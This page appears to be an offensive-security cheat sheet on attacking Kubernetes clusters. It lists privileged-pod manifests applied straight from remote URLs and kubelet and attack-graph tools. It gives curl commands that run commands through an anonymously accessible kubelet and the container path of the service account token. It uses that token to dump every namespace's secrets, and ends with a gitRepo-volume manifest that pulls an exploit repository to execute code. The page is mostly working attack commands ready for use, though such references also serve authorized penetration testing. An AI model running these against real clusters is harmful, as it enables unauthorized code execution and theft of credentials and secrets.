Skip to content

Kubernetes

Kubernetes, often abbreviated as K8s, is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications

Summary

Tools

  • BishopFox/badpods - A collection of manifests that will create pods with elevated privileges.
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml
    
  • serain/kubelet-anon-rce - Executes commands in a container on a kubelet endpoint that allows anonymous authentication
  • DataDog/KubeHound - Kubernetes Attack Graph
    # Critical paths enumeration
    kh.containers().criticalPaths().count()
    kh.containers().dedup().by("name").criticalPaths().count()
    kh.endpoints(EndpointExposure.ClusterIP).criticalPaths().count()
    kh.endpoints(EndpointExposure.NodeIP).criticalPaths().count()
    kh.endpoints(EndpointExposure.External).criticalPaths().count()
    kh.services().criticalPaths().count()
    
    # DNS services and port
    kh.endpoints(EndpointExposure.External).criticalPaths().limit(local,1)
    .dedup().valueMap("serviceDns","port")
    .group().by("serviceDns").by("port")
    

Exploits

Accessible kubelet on 10250/TCP

Requirements:

  • --anonymous-auth: Enables anonymous requests to the Kubelet server

Exploit:

  • Getting pods: curl -ks https://worker:10250/pods
  • Run commands: curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'

Obtaining Service Account Token

Token is stored at /var/run/secrets/kubernetes.io/serviceaccount/token

Use the service account token: * on kube-apiserver API: curl -ks -H "Authorization: Bearer <TOKEN>" https://master:6443/api/v1/namespaces/{namespace}/secrets * with kubectl: kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="<TOKEN>" get secrets --all-namespaces -o json

Create gitRepo Volumes to Execute Code

Requirements:

  • gitRepo volume type enabled
  • create rights on pods

Exploit:

apiVersion: v1
kind: Pod
metadata:
  name: test-pd
spec:
  containers:
  - image: alpine:latest
    command: ["sleep","86400"]
    name: test-container
    volumeMounts:
    - mountPath: /gitrepo
      name: gitvolume
  volumes:
  - name: gitvolume
    gitRepo:
      directory: g/.git
      repository: https://github.com/raesene/repopodexploit.git
      revision: main

References